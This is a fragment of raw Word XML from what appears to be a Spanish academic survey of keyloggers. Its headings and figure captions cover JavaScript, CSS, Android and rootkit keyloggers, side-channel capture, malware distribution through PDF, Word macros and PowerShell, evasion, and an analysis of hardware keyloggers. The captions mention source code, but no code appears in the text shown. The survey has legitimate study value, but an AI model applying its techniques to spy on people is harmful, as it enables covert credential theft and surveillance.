            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00063373">
            <w:instrText xml:space="preserve">CITATION Mic18 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C32884">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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4" w:name="_Toc18453501"/>
      <w:bookmarkStart w:id="65" w:name="_Toc19810054"/>
      <w:r>
        <w:t>Como rootkit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
      <w:bookmarkEnd w:id="65"/>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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00697778">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="007F77A8">
            <w:instrText xml:space="preserve">CITATION Ker14 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00697778">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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6" w:name="_Toc18453502"/>
      <w:bookmarkStart w:id="67" w:name="_Toc19810055"/>
      <w:r>
        <w:t xml:space="preserve">Basado en </w:t>
      </w:r>
      <w:r w:rsidR="002B27CC">
        <w:t>Javascript</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
      <w:bookmarkEnd w:id="67"/>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EndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION ato \l 3082 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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1C4A7BE2" wp14:editId="707F3EC7">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8" w:name="_Toc19358153"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Código fuente de un keylogger en Javascript.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>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5C98428A" wp14:editId="583D97DA">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9" w:name="_Toc19358154"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Código fuente en PHP del backend del keylogger que registra las pulsaciones.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>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70" w:name="_Toc18453503"/>
      <w:bookmarkStart w:id="71" w:name="_Toc19810056"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Inyección de memoria.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
      <w:bookmarkEnd w:id="7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2" w:name="_Toc18453504"/>
      <w:bookmarkStart w:id="73" w:name="_Toc19810057"/>
      <w:r>
        <w:t>Event Tracing for Windows</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w:rsidR="00692453" w:rsidRDefault="00255836" w:rsidP="00692453">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El </w:t>
      </w:r>
      <w:r w:rsidRPr="00255836">
        <w:t xml:space="preserve">Event Tracing for Windows </w:t>
      </w:r>
      <w:r w:rsidR="008622C4">
        <w:t>(ETW)</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-210884439"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="008622C4">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="008622C4">
            <w:instrText xml:space="preserve"> CITATION Cyb16 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="008622C4">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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4" w:name="_Toc18453505"/>
      <w:bookmarkStart w:id="75" w:name="_Toc19810058"/>
      <w:r>
        <w:t>Basados en CSS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
      <w:bookmarkEnd w:id="75"/>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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00530025">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00530025">
            <w:instrText xml:space="preserve"> CITATION Max18 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00530025">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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4DF7595D" wp14:editId="252C3674">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6" w:name="_Toc19358155"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra de parte de archivo CSS para crear un keylogger.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w:rsidR="00313AD9" w:rsidRDefault="00692453" w:rsidP="00313AD9">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc18453506"/>
      <w:bookmarkStart w:id="78" w:name="_Toc19810059"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Dispositiv</w:t>
      </w:r>
      <w:r w:rsidR="00313AD9">
        <w:t>os móviles</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
      <w:bookmarkEnd w:id="78"/>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EndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION Hao \l 3082 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[17]</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00313AD9">
        <w:t xml:space="preserve"> presentó un estudio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-697852027"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION Hao11 \l 3082 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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2C31C8AC" wp14:editId="0CEC41BC">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9" w:name="_Toc19358156"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="0086404E">
        <w:t>Patro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nes típicos de ángulos </w:t>
      </w:r>
      <w:r w:rsidRPr="0086404E">
        <w:t>y balanceo cuando se presionan diferentes teclas de dígitos.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="001729BE">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="001729BE">
            <w:instrText xml:space="preserve"> CITATION Tom12 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="001729BE">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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5EA27534" wp14:editId="197736AB">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80" w:name="_Toc19358157"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Ejemplo de método modificado en Android </w:t>
      </w:r>
      <w:r w:rsidR="007C5B01">
        <w:t xml:space="preserve">SDK </w:t>
      </w:r>
      <w:r>
        <w:t>para crear un keylogger.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w:rsidR="00AE411A" w:rsidRDefault="00AE411A" w:rsidP="00692453">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AA149F" w:rsidRDefault="00AA149F" w:rsidP="00906C5A">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc18453507"/>
      <w:bookmarkStart w:id="82" w:name="_Toc19810060"/>
      <w:r>
        <w:t>Otras técnicas usando canales laterales</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
      <w:bookmarkEnd w:id="82"/>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3" w:name="_Toc18453508"/>
      <w:bookmarkStart w:id="84" w:name="_Toc19810061"/>
      <w:r>
        <w:t>Criptoanálisis acústico.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
      <w:bookmarkEnd w:id="84"/>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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="008B4D68">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00DC27FC">
            <w:instrText xml:space="preserve">CITATION Dmi04 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="008B4D68">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00DC27FC">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00DC27FC">
            <w:instrText xml:space="preserve"> CITATION LiZ05 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00DC27FC">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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5" w:name="_Toc18453509"/>
      <w:bookmarkStart w:id="86" w:name="_Toc19810062"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Emisiones electromagnéticas.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
      <w:bookmarkEnd w:id="86"/>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EndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00EA1275">
            <w:instrText xml:space="preserve">CITATION Com09 \l 3082 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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7" w:name="_Toc18453510"/>
      <w:bookmarkStart w:id="88" w:name="_Toc19810063"/>
      <w:r>
        <w:t>Captura inalámbrica.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
      <w:bookmarkEnd w:id="88"/>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End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DF019A">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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0D78EB62" wp14:editId="72EAB6FC">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9" w:name="_Toc19358158"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra de los circuitos incorporados en el keylogger KeySweeper.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>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90" w:name="_Toc421702487"/>
      <w:bookmarkStart w:id="91" w:name="__RefHeading___Toc1100_228935268"/>
      <w:bookmarkStart w:id="92" w:name="_Toc18453511"/>
      <w:bookmarkStart w:id="93" w:name="_Toc19810064"/>
      <w:r w:rsidRPr="00853E9A">
        <w:lastRenderedPageBreak/>
        <w:t>T</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
      <w:r w:rsidRPr="00853E9A">
        <w:t>écnicas de distribución</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
      <w:bookmarkEnd w:id="92"/>
      <w:bookmarkEnd w:id="93"/>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4" w:name="_Toc18453512"/>
      <w:bookmarkStart w:id="95" w:name="_Toc19810065"/>
      <w:r>
        <w:t>Ataques de incrustación de PDF</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
      <w:bookmarkEnd w:id="95"/>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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="0050349C">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="0050349C">
            <w:instrText xml:space="preserve"> CITATION Nor18 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="0050349C">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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317ADE14" wp14:editId="51A67AE8">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6" w:name="_Toc19358159"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Script que ejecutará el malware incrustado una vez abierto el PDF.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>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End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DF019A">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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7" w:name="_Toc18453513"/>
      <w:bookmarkStart w:id="98" w:name="_Toc19810066"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Incrustación en documentos de Word</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
      <w:bookmarkEnd w:id="9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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00C03174">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C03174">
            <w:instrText xml:space="preserve"> CITATION Mic19 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C03174">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00281A8B">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00281A8B">
            <w:instrText xml:space="preserve"> CITATION Mic2 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00281A8B">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[52]</w:t>
          </w:r>
          <w:r w:rsidR="00281A8B">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00281A8B">
        <w:t xml:space="preserve"> una macro de código</w:t>
      </w:r>
      <w:r w:rsidR="0018183E">
        <w:t xml:space="preserve"> malicioso</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1459838436"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="0018183E">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="0018183E">
            <w:instrText xml:space="preserve"> CITATION Mic191 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="0018183E">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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9" w:name="_Toc18453514"/>
      <w:bookmarkStart w:id="100" w:name="_Toc19810067"/>
      <w:r w:rsidRPr="00BC13CF">
        <w:rPr>
          <w:rStyle w:val="Ttulo2Car"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Incrustación dentro de Scripts PowerShell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
      <w:bookmarkEnd w:id="100"/>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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00B75262">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00B75262">
            <w:instrText xml:space="preserve"> CITATION Fab16 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00B75262">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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7AC607B8" wp14:editId="1A231E33">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101" w:name="_Toc19358160"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra del texto del párrafo anterior codificado en Base64.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>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2" w:name="__RefHeading___Toc888_3518492859"/>
      <w:bookmarkStart w:id="103" w:name="_Toc18453515"/>
      <w:bookmarkStart w:id="104" w:name="_Toc19810068"/>
      <w:r w:rsidRPr="00853E9A">
        <w:lastRenderedPageBreak/>
        <w:t>Técnicas de ocultación y evasión</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
      <w:bookmarkEnd w:id="103"/>
      <w:bookmarkEnd w:id="104"/>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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00D91D1D">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00D91D1D">
            <w:instrText xml:space="preserve"> CITATION Kee3 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00D91D1D">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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504A43D9" wp14:editId="4C19B3F3">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5" w:name="_Toc19358161"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra de keylogger</w:t>
      </w:r>
      <w:r w:rsidR="00182717">
        <w:t xml:space="preserve"> hardware </w:t>
      </w:r>
      <w:r>
        <w:t>instalado en el interior de un teclado.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>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EndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION Kee2 \l 3082 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00DF78F4">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00DF78F4">
            <w:instrText xml:space="preserve"> CITATION Wik \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00DF78F4">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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6" w:name="_Toc18453516"/>
      <w:bookmarkStart w:id="107" w:name="_Toc19810069"/>
      <w:r w:rsidRPr="001019E0">
        <w:lastRenderedPageBreak/>
        <w:t>Análisis</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de Keylogger Hardware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
      <w:bookmarkEnd w:id="107"/>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11193C22" wp14:editId="1024A970">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8" w:name="_Toc19358162"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Foto de los keyloggers hardware analizados</w:t>
      </w:r>
      <w:bookmarkEnd w:id="108"/>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6984F34B" wp14:editId="2C767AA2">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9" w:name="_Toc19358163"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Vista en detalle de los dos keyloggers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="109"/>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10" w:name="_Toc19810126"/>
      <w:r>
        <w:t xml:space="preserve">Tabla </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Tabla \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Resumen características keyloggers Hardware analizados.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>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11" w:name="_Toc18453517"/>
      <w:bookmarkStart w:id="112" w:name="_Toc19810070"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>KeeL</w:t>
      </w:r>
      <w:r w:rsidR="00752D72">
        <w:t xml:space="preserve">og </w:t>
      </w:r>
      <w:r w:rsidR="00E357F9">
        <w:t>KeyGrabber Pico</w:t>
      </w:r>
      <w:r w:rsidR="00752D72">
        <w:t xml:space="preserve"> 16Mb</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
      <w:bookmarkEnd w:id="112"/>
    </w:p>
    <w:p w:rsidR="001554F1" w:rsidRDefault="001554F1" w:rsidP="0077360B">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Este</w:t>
      </w:r>
      <w:r w:rsidR="00A82047">
        <w:t xml:space="preserve"> keylogger</w:t>
